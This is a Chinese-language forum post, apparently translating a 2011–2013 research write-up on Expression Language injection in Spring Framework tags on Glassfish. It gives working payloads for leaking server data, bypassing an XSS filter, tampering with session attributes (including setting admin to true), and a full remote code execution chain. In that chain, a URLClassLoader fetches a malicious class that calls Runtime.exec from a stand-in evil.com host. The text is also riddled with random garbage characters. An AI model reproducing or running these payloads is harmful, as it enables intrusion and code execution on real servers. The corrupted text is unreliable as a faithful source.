Remote Code with
- H. m D( c+ v2 F7 [Expression Language Injection
' O+ J+ y1 _* D7 Y3 E9 r) [5 MSpring Framework脆弱性—DanAmodio
0 f5 v% E+ R0 ^6 F# S' R9 h全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中7 G* ]# f4 P" v( Z' X
可能会存在风险。2 y+ h; [2 x' {; C- h l
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的. @+ H7 J: Q# w* s
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可" F( `/ x( ?1 |) P7 ^% D
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,( U2 m6 d0 C- g/ E: R
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前9 r1 O4 ?, ]( K/ o. Y- y
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
9 ]- `- i: N+ ^由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但. S, B0 r% K* [) c
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
0 U- h8 ~2 S" f6 q; K本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。( P4 |8 N( E* E. X
这些版本不支持禁用double EL resolution.8 K( u4 o8 N( s& u, R/ y
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
1 w9 B- }' }( ]% v1 \9 [EL2.2容器上可能进行远程代码执行。
5 g2 e5 ^9 a0 H; c这是一个原始信息泄露的攻击例子:
/ S. ]$ N0 p8 k& p- \ h请求:
' R3 J3 \; E. x6 f) v [ttp://vulnerable.com/foo?message=${applicationScope}
G8 m, S7 `% H4 b, D$ C! y1 t" J到达以下内容页面:; ]) l o6 n9 d; z0 g/ ^% v
结果将输出一些包含内部服务器信息calsspath 和本地工作目录1 D3 d3 G# O1 y
你也可以做一些其他事情,如这样:& D7 i3 \! W+ U* i6 \4 @6 ]! l
${9999+1}; H( c# w2 v5 Q2 ?& ]2 a! Y; j4 s
还可以访问session 对象和beans
% B$ [: t# Q o. v2 u9 p${employee.lastName}1 J- R' k8 _6 w3 Z6 T9 q6 s
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
9 {* a8 u$ L$ n& p7 AEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
) g( D6 n1 g5 b4 T |9 t西,比如XSS.0 S ^! F- n/ W- P. ], g/ H* m
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
- `& v2 K- v! M- Z3 c突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤 a. S4 c9 R+ c) K
呢?”
( Q6 j1 L5 `% A0 O* i因此,我尝试巳缦拢�
( y/ M" e; k; ?http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP$ ~4 }1 ~8 m9 N
P
7 W2 I6 i( R7 ] F1 ?我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返9 l, @+ A# e8 \* @* c
回的文本被插入进了spring:message 标签。
# ] C, b+ |3 G6 S/ h" V% H+ _2 n这里是一个最终绕过过滤的实例:" D# K7 w$ ?& j. |0 q0 B* K$ U
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ, c# v7 y/ W8 C3 y
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为/ n1 R. `3 _6 x. k. _' J
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?( } X% D) L5 E4 L2 v( _+ O5 y
经过一番研究,我学习到EL2.2 增加了方法调用。
8 q) B- A6 q5 m, b: e- ]我写了一个快速测试应用程序代码并且检测一些功能" I7 A/ ?, e9 v
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
! A3 ?& G+ `) B/ A${pageContext.request.getSession().setAttribute(“admin”,true)}
/ ~% U7 J, Y+ Q! b- N好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的- V9 E1 t9 W8 t, e4 z5 ~
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
$ o( E/ M( M* g1 R: t1 h, y. y; A' i${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1" g5 H$ d( R" d# c4 o; @, Q% y
“, 1234)}
) d' P0 N* ~' u$ q8 H2 o/ F${“”.getClass().forName(“java.lang.Runtime”)}1 ]5 p, c% o3 f7 F$ c4 U
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不; V* D7 n! M5 k% E \+ y
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函' k; f' y3 y% A" u5 m9 h
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
% _) Q: e3 F) E一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于& x8 { W$ d9 c4 }
方法签名invoke(Object obj, Object„ args)3 j) t, [4 X; A9 j) ]
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
7 [, x1 X1 l8 E题,以让它可以工作起来。) N+ X( ~" Y$ `9 Z- {& I+ j2 W
漏洞利用: P+ O9 y2 y: w0 k- z* D5 y
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
, J( H2 G6 d" s$ @ |( A0 H: d$ L希望你们中的一些JAVA奇才告诉我我是如此的可笑。
. v: x& F; f" d2 f这里有一些我试过的失败的用例,为了试图让它工作的用例:# ~; D0 C; v# w
写文件到文件系统0 d9 Z/ G% k" y
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
4 L6 g1 k, o+ e6 C4 e3 }6 |2 o我认为这些可以很好的工作,但是我不能找到合适的类来载入。
: D, P9 f+ M6 \( [6 B! m u) b${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}: J6 M+ J. z# z3 g
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:: p/ W2 Z I/ X& P6 P ]% g
org.springframework.expression.spel.standard.SpelExpressionParser not found
1 x/ B+ g7 {" E8 U$ Q" Iby) ~/ j" W8 P6 {% h+ d
org.glassfish.web.javax.servlet.jsp [194].$ ?. w' n' F; u; b1 z8 |- _& M2 @
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
5 h8 j2 ]8 L# Y% z. r 利用反射来创建一个新的Runtime(and watch the world burn)4 s/ _ O/ s4 e4 b9 f6 C' G
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName2 P3 p8 ]. D% h7 S( E! a5 \& w% Q
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}7 @6 w( ~: B; U: O' I0 ^
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}8 x4 g2 Q" A) f) K7 W
使用java.lang.ProcessBuilder! e. e( D& _3 ?* c& T
用表达式语言来评估表达式语言
* `) b, p3 j. S/ o* }7 QExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
0 Q0 A8 l; [3 |3 v' M$ V${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request3 f- ]6 o4 @( C
“,”".getClass(),null)}
4 h) w" A, ?. T; Q: v 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)9 Z e! b3 P! X* O3 K0 Z
我在使用一个空数组通过Method.invoke()时失败了很多次
. Z2 H5 A2 X$ h+ G6 e. P“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo' V& P- U/ y2 y9 w# N
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
4 U* G5 @, V7 {0 k# q; ?rrayList”).newInstance().toArray())
?. x+ f) Q1 B, ]* p9 Wjava.lang.IllegalArgumentException: wrong number of arguments( \/ w+ { J5 R: F9 c
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
! `. ?7 K) K! Z8 k- v+ U4 D以创建一个恶意class文件并且指向类装载器.
4 g( A( _8 A; ?# j我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
E `) l. Q: l/ upublic class Malicious {+ O+ v: u |1 y$ l3 [3 y
public Malicious() {
) C5 W2 ]7 e( K: d; Ntry {
: }2 j/ A/ q, s% w5 u" U0 e jjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac! a4 ?+ {! c4 G" e) [; O
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
: b; R2 p, U" X0 n& i$ P. f} catch (Exception e) {
& P0 s1 C$ R# e}
1 N( w: Q, n4 r* [2 B}
6 C' O h7 L$ `" w; _我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
, ~5 M/ T- C3 |( X* S1 n% A话中,因此它可以被使用.% z$ i0 i; b3 C( Y
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName6 {( Z% T+ X+ I, b* k# h
(“java.util.ArrayList”).newInstance())}
( O$ J& N) q! HURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
% x3 i* `* _, R/ D) ~& ^一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
0 q- Y3 J: t- \getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
v8 H) ^! w/ @7 ?1 `9 M5 D我们可以调用的create(string)方法,然后转换对一个URL对象。
8 o& t; U# P% c5 p% L${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh# w1 O, k4 t% t- o
ere/malicious/classfile/is/located/”).toURL())}
9 E/ R0 \$ [0 j ?然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,6 t- f) p$ K$ Z! W
恶意类文件被装载并创建,触发远程代码.
6 N6 U2 y% }& Z3 l! ^5 }${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte; ~2 ^$ U9 L- {
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
( c0 }) P4 E- x+ S# `& A3 Z2 K ugetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance# S" ]* O! J, N/ u2 y) X
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对